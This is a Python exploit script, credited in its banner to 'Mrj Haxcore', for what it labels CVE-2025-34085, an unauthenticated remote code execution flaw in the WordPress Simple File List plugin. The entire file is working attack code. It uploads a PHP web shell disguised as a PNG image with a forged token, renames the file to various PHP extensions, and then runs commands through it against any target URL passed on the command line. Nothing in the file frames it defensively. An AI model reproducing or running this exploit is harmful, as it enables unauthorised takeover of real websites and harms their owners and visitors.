#!/usr/bin/env python3
# Exploit for CVE-2025-34085
# By Mrj Haxcore

banner = r"""
   _______      ________            ___   ___ ___  _____            ____  _  _    ___   ___  _____ 
  / ____\ \    / /  ____|          |__ \ / _ \__ \| ____|          |___ \| || |  / _ \ / _ \| ____|
 | |     \ \  / /| |__     ______     ) | | | | ) | |__    ______    __) | || |_| | | | (_) | |__  
 | |      \ \/ / |  __|   |______|   / /| | | |/ /|___ \  |______|  |__ <|__   _| | | |> _ <|___ \ 
 | |____   \  /  | |____            / /_| |_| / /_ ___) |           ___) |  | | | |_| | (_) |___) |
  \_____|   \/   |______|          |____|\___/____|____/           |____/   |_|  \___/ \___/|____/ 
                                                                                                   
                          CVE-2025-34085 Unauthenticated RCE Exploit
                                  Coded by Mrj Haxcore
"""

import requests
import hashlib
import time
import random
import string
import sys
import uuid

def rand_str(n=8):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))

def generate_payload():
    return "system($_GET['cmd']);"

def upload_shell(target, filename, payload):
    boundary = f"----WebKitFormBoundary{uuid.uuid4().hex[:16]}"
    upload_url = f"{target}/wp-content/plugins/simple-file-list/ee-upload-engine.php"
    upload_dir = "/wp-content/uploads/simple-file-list/"
    timestamp = str(int(time.time()))
    token = hashlib.md5(f'unique_salt{timestamp}'.encode()).hexdigest()

    php_payload = f"<?php {payload} ?>"
    fake_file = php_payload.encode()

    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="eeSFL_ID"\r\n\r\n'
        f"1\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="eeSFL_FileUploadDir"\r\n\r\n'
        f"{upload_dir}\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="eeSFL_Timestamp"\r\n\r\n'
        f"{timestamp}\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="eeSFL_Token"\r\n\r\n'
        f"{token}\r\n"
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}.png"\r\n'
        f"Content-Type: image/png\r\n\r\n"
    ).encode() + fake_file + f"\r\n--{boundary}--\r\n".encode()

    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Referer": f"{target}/wp-admin",
        "Origin": target,
        "Accept": "*/*"
    }

    print(f"[+] Uploading shell as {filename}.png...")
    try:
        r = requests.post(upload_url, data=body, headers=headers, timeout=10)
    except Exception as e:
        print(f"[-] Upload request failed: {e}")
        return False

    if r.status_code == 200 and "SUCCESS" in r.text:
        print("[+] Upload successful.")
        return True
    else:
        print(f"[-] Upload failed. Response code: {r.status_code}")
        return False

def rename_shell(target, filename):
    url = f"{target}/wp-content/plugins/simple-file-list/ee-file-engine.php"
    extensions = ['php', 'php5', 'phtml', 'phar', 'php3', 'php4', 'pHp']

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Referer': f'{target}/wp-admin',
        'Origin': target,
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept': '*/*'
    }

    for ext in extensions:
        new_name = f"{filename}.{ext}"
        data = {
            'eeSFL_ID': '1',
            'eeListFolder': '/',
            'eeFileOld': f"{filename}.png",
            'eeFileAction': f"Rename|{new_name}"
        }

        print(f"[+] Trying to rename to: {new_name}...")
        try:
            r = requests.post(url, data=data, headers=headers, timeout=10)
        except Exception as e:
            print(f"[-] Rename request failed: {e}")
            continue

        if r.status_code == 200:
            print(f"[+] Rename successful: {new_name}")
            return new_name
        else:
            print(f"[-] Rename failed. Response code: {r.status_code}")

    print("[-] All rename attempts failed.")
    return None

def trigger_shell(target, filename):
    url = f"{target}/wp-content/uploads/simple-file-list/{filename}"
    print(f"[+] Triggering shell: {url}?cmd=id")

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Referer": target,
    }

    try:
        r = requests.get(url, params={"cmd": "id"}, headers=headers, timeout=10)
    except Exception as e:
        print(f"[-] Shell trigger failed: {e}")
        return

    if r.status_code == 200:
        print("[+] Shell output:")
        print(r.text.strip())
    else:
        print(f"[-] Shell returned HTTP {r.status_code}")

def main():
    print(banner)
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} http://target.site")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    filename = rand_str()
    payload = generate_payload()

    if upload_shell(target, filename, payload):
        new_filename = rename_shell(target, filename)
        if new_filename:
            trigger_shell(target, new_filename)

if __name__ == "__main__":
    main()